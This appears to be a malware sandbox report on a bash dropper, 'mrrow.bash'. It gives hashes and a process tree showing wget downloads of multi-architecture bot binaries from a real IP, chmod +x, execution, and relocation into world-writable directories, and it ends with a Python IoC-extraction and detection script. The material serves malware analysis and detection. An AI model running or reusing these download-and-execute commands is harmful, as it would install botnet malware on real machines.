Resubmissions
(submission time, analysis ID, score)
09-08-2022 19:31   220809-x8ezrafabp   5
09-08-2022 19:22   220809-x28cqaehdq   5
09-08-2022 19:21   220809-x2ny3sgec6   5

Analysis
max time kernel: 0s
max time network: 158s
platform: linux_armhf
resource: debian9-armhf-en-20211208
resource tags: arch:armhf, image:debian9-armhf-en-20211208, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 09-08-2022 19:22
Static task: static1
Behavioral task: behavioral1 (sample mrrow.bash, resource ubuntu1804-amd64-en-20211208)
Behavioral task: behavioral2 (sample mrrow.bash, resource debian9-armhf-en-20211208)
Behavioral task: behavioral3 (sample mrrow.bash, resource debian9-mipsbe-en-20211208)
Behavioral task: behavioral4 (sample mrrow.bash, resource debian9-mipsel-en-20211208)
General
Target: mrrow.bash
Size: 2KB
MD5: 9486bdff70b6ec6243b012a91e90c21e
SHA1: 2364e70ee0d49e4e641fa7428958f5907a8c26a3
SHA256: 2db0ba4efda0653533e32abca1417cafb84f58322dc8d4df183e64771626b826
SHA512: e64e2324c403d967d3d04140bb0eba159e57b83db09fdd50e882a8edc595211837505c86c1d44a65d11b9c3a34c0d02496b3c06f264e1175e248397e9716b4bd
Malware Config
Signatures

Reads runtime system information (6 IoCs)
Reads data from /proc virtual filesystem.
Processes: mv, mkdir, mv, mkdir
  description         ioc                 process
  /proc/filesystems   /proc/filesystems   mv
  /proc/398/exe       /proc/398/exe       mv
  /proc/filesystems   /proc/filesystems   mkdir
  /proc/filesystems   /proc/filesystems   mv
  /proc/387/exe       /proc/387/exe       mv
  /proc/filesystems   /proc/filesystems   mkdir

Writes file to tmp directory (1 IoC)
Malware often drops required files in the /tmp directory.
Processes: mrrow.bash
  description       ioc               process
  /tmp/mrrow.bash   /tmp/mrrow.bash   mrrow.bash
Processes

Read as a whole, the tree below shows a multi-architecture downloader. The script (invoked as /tmp/mrrow.bash sudo) fetches bot.mips, bot.mpsl, bot.arm, bot.arm5, bot.arm6 and bot.arm7 in turn over plain HTTP from 109.206.241.211/bins/, runs cat on each one (the file fuwwyowo appears in the very next chmod +x argument list, so the cat output is evidently redirected into it), marks everything in the working directory executable (the chmod +x argument list is the full directory contents, including the script itself and a systemd-private-* directory, and it grows by one file per download), and runs ./fuwwyowo with the argument ssh after each download. In this run the bot.arm7 download is not followed by a cat/chmod/exec step. The final stages create a top-level directory with a random-looking name (/qaujoxnrr1/, then /d691shta9j/), create an empty file of the same name inside it, move /tmp/fuwwyowo over that file and chmod 777 it. The tree does not show /tmp/fuwwyowo being recreated between the two mv commands, so whether the second relocation succeeded cannot be determined from this report. Because the directory names look randomly generated, the pattern (new directory directly under /, containing a world-writable file of the same name) is a more durable indicator than the literal names.

One process per line as "image: command line"; indented lines are children of the nearest unindented process above them; matched signatures are shown in brackets under the process.

/tmp/mrrow.bash: /tmp/mrrow.bash sudo
  [Writes file to tmp directory]
  /usr/bin/wget: wget http://109.206.241.211/bins/bot.mips
  /bin/cat: cat bot.mips
  /bin/chmod: chmod +x bot.mips fuwwyowo mrrow.bash systemd-private-fe6e25270ab24b498dda7e817c5daab8-systemd-timesyncd.service-twUfq5
  ./fuwwyowo: ./fuwwyowo ssh
  /usr/bin/wget: wget http://109.206.241.211/bins/bot.mpsl
  /bin/cat: cat bot.mpsl
  /bin/chmod: chmod +x bot.mips bot.mpsl fuwwyowo mrrow.bash systemd-private-fe6e25270ab24b498dda7e817c5daab8-systemd-timesyncd.service-twUfq5
  ./fuwwyowo: ./fuwwyowo ssh
  /usr/bin/wget: wget http://109.206.241.211/bins/bot.arm
  /bin/cat: cat bot.arm
  /bin/chmod: chmod +x bot.arm bot.mips bot.mpsl fuwwyowo mrrow.bash systemd-private-fe6e25270ab24b498dda7e817c5daab8-systemd-timesyncd.service-twUfq5
  ./fuwwyowo: ./fuwwyowo ssh
  /usr/bin/wget: wget http://109.206.241.211/bins/bot.arm5
  /bin/cat: cat bot.arm5
  /bin/chmod: chmod +x bot.arm bot.arm5 bot.mips bot.mpsl fuwwyowo mrrow.bash systemd-private-fe6e25270ab24b498dda7e817c5daab8-systemd-timesyncd.service-twUfq5
  ./fuwwyowo: ./fuwwyowo ssh
  /usr/bin/wget: wget http://109.206.241.211/bins/bot.arm6
  /bin/cat: cat bot.arm6
  /bin/chmod: chmod +x bot.arm bot.arm5 bot.arm6 bot.mips bot.mpsl fuwwyowo mrrow.bash systemd-private-fe6e25270ab24b498dda7e817c5daab8-systemd-timesyncd.service-twUfq5
  ./fuwwyowo: ./fuwwyowo ssh
  /usr/bin/wget: wget http://109.206.241.211/bins/bot.arm7
/bin/sh: sh -c "mkdir /qaujoxnrr1/ && >/qaujoxnrr1/qaujoxnrr1 && cd /qaujoxnrr1/ >/dev/null"
  /bin/mkdir: mkdir /qaujoxnrr1/
    [Reads runtime system information]
/bin/sh: sh -c "mv /tmp/fuwwyowo /qaujoxnrr1/qaujoxnrr1 && chmod 777 /qaujoxnrr1/qaujoxnrr1 >/dev/null"
  /bin/mv: mv /tmp/fuwwyowo /qaujoxnrr1/qaujoxnrr1
    [Reads runtime system information]
  /bin/chmod: chmod 777 /qaujoxnrr1/qaujoxnrr1
/bin/sh: sh -c "mkdir /d691shta9j/ && >/d691shta9j/d691shta9j && cd /d691shta9j/ >/dev/null"
  /bin/mkdir: mkdir /d691shta9j/
    [Reads runtime system information]
/bin/sh: sh -c "mv /tmp/fuwwyowo /d691shta9j/d691shta9j && chmod 777 /d691shta9j/d691shta9j >/dev/null"
  /bin/mv: mv /tmp/fuwwyowo /d691shta9j/d691shta9j
    [Reads runtime system information]
  /bin/chmod: chmod 777 /d691shta9j/d691shta9j
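As an added example, not part of the sandbox report or of the sample itself, the script below takes the command lines from the process tree above (transcribed by hand into a list, so it runs offline) and turns them into a short IoC list: the download host and payload URLs, the download-then-chmod-then-execute sequence, and the files moved out of /tmp and made world-writable. The function names, the regular expressions and the four-command look-ahead window are assumptions of this example, chosen to fit the tree as shown here; the same functions work on command lines pulled from any other process log.

```python
import re
from urllib.parse import urlparse

# Command lines transcribed from the process tree in the report above, in tree
# order. Constructed input for this example; the report does not export this form.
PROCESS_TREE = [
    "/tmp/mrrow.bash sudo",
    "wget http://109.206.241.211/bins/bot.mips",
    "cat bot.mips",
    "chmod +x bot.mips fuwwyowo mrrow.bash systemd-private-fe6e25270ab24b498dda7e817c5daab8-systemd-timesyncd.service-twUfq5",
    "./fuwwyowo ssh",
    "wget http://109.206.241.211/bins/bot.mpsl",
    "cat bot.mpsl",
    "chmod +x bot.mips bot.mpsl fuwwyowo mrrow.bash systemd-private-fe6e25270ab24b498dda7e817c5daab8-systemd-timesyncd.service-twUfq5",
    "./fuwwyowo ssh",
    "wget http://109.206.241.211/bins/bot.arm",
    "cat bot.arm",
    "chmod +x bot.arm bot.mips bot.mpsl fuwwyowo mrrow.bash systemd-private-fe6e25270ab24b498dda7e817c5daab8-systemd-timesyncd.service-twUfq5",
    "./fuwwyowo ssh",
    "wget http://109.206.241.211/bins/bot.arm5",
    "cat bot.arm5",
    "chmod +x bot.arm bot.arm5 bot.mips bot.mpsl fuwwyowo mrrow.bash systemd-private-fe6e25270ab24b498dda7e817c5daab8-systemd-timesyncd.service-twUfq5",
    "./fuwwyowo ssh",
    "wget http://109.206.241.211/bins/bot.arm6",
    "cat bot.arm6",
    "chmod +x bot.arm bot.arm5 bot.arm6 bot.mips bot.mpsl fuwwyowo mrrow.bash systemd-private-fe6e25270ab24b498dda7e817c5daab8-systemd-timesyncd.service-twUfq5",
    "./fuwwyowo ssh",
    "wget http://109.206.241.211/bins/bot.arm7",
    'sh -c "mkdir /qaujoxnrr1/ && >/qaujoxnrr1/qaujoxnrr1 && cd /qaujoxnrr1/ >/dev/null"',
    "mkdir /qaujoxnrr1/",
    'sh -c "mv /tmp/fuwwyowo /qaujoxnrr1/qaujoxnrr1 && chmod 777 /qaujoxnrr1/qaujoxnrr1 >/dev/null"',
    "mv /tmp/fuwwyowo /qaujoxnrr1/qaujoxnrr1",
    "chmod 777 /qaujoxnrr1/qaujoxnrr1",
    'sh -c "mkdir /d691shta9j/ && >/d691shta9j/d691shta9j && cd /d691shta9j/ >/dev/null"',
    "mkdir /d691shta9j/",
    'sh -c "mv /tmp/fuwwyowo /d691shta9j/d691shta9j && chmod 777 /d691shta9j/d691shta9j >/dev/null"',
    "mv /tmp/fuwwyowo /d691shta9j/d691shta9j",
    "chmod 777 /d691shta9j/d691shta9j",
]

URL_RE = re.compile(r"https?://[^\s\"']+")
MV_RE = re.compile(r"^mv\s+(\S+)\s+(\S+)$")
MODE_777_RE = re.compile(r"^chmod\s+777\s+(\S+)$")
REL_EXEC_RE = re.compile(r"^\./(\S+)")


def extract_iocs(cmdlines):
    """Network and file indicators: download URLs (in order, deduplicated),
    the hosts they point at, and every (source, destination) pair moved by mv."""
    urls, hosts, moves = [], set(), []
    for cmd in cmdlines:
        for url in URL_RE.findall(cmd):
            if url not in urls:
                urls.append(url)
            hosts.add(urlparse(url).hostname)
        m = MV_RE.match(cmd)
        if m:
            moves.append((m.group(1), m.group(2)))
    return {"urls": urls, "hosts": sorted(hosts), "moves": moves}


def staged_executions(cmdlines, window=4):
    """Flag the dropper sequence: a wget followed, within `window` later commands,
    by `chmod +x` and then execution of a relative binary (./name).
    Returns (url, executed name) pairs. The window is an assumption of this
    example, sized to the download / cat / chmod / exec rhythm of the tree above."""
    hits = []
    for i, cmd in enumerate(cmdlines):
        urls = URL_RE.findall(cmd)
        if not cmd.startswith("wget") or not urls:
            continue
        later = cmdlines[i + 1:i + 1 + window]
        chmod_at = next((j for j, c in enumerate(later) if c.startswith("chmod +x")), None)
        if chmod_at is None:
            continue  # download without a chmod +x in range: not the full pattern
        for c in later[chmod_at + 1:]:
            m = REL_EXEC_RE.match(c)
            if m:
                hits.append((urls[0], m.group(1)))
                break
    return hits


def world_writable_relocations(cmdlines):
    """Destinations of files moved out of /tmp that are then chmod 777'd,
    i.e. the relocation step at the end of the tree."""
    moved_out = {dst for src, dst in extract_iocs(cmdlines)["moves"] if src.startswith("/tmp/")}
    return [m.group(1) for m in map(MODE_777_RE.match, cmdlines) if m and m.group(1) in moved_out]


if __name__ == "__main__":
    iocs = extract_iocs(PROCESS_TREE)
    print("download hosts:", iocs["hosts"])
    for url in iocs["urls"]:
        print("  payload:", url)
    for url, name in staged_executions(PROCESS_TREE):
        print("download-then-exec:", url, "->", name)
    for path in world_writable_relocations(PROCESS_TREE):
        print("moved out of /tmp and chmod 777:", path)
```

Run against the tree above this reports one host, six payload URLs, five download-then-exec hits (the bot.arm7 download is correctly not flagged because no chmod +x or execution follows it in the window) and the two relocated, world-writable copies. The URL regex deliberately stops at quotes and whitespace so that URLs embedded in sh -c strings are still captured cleanly.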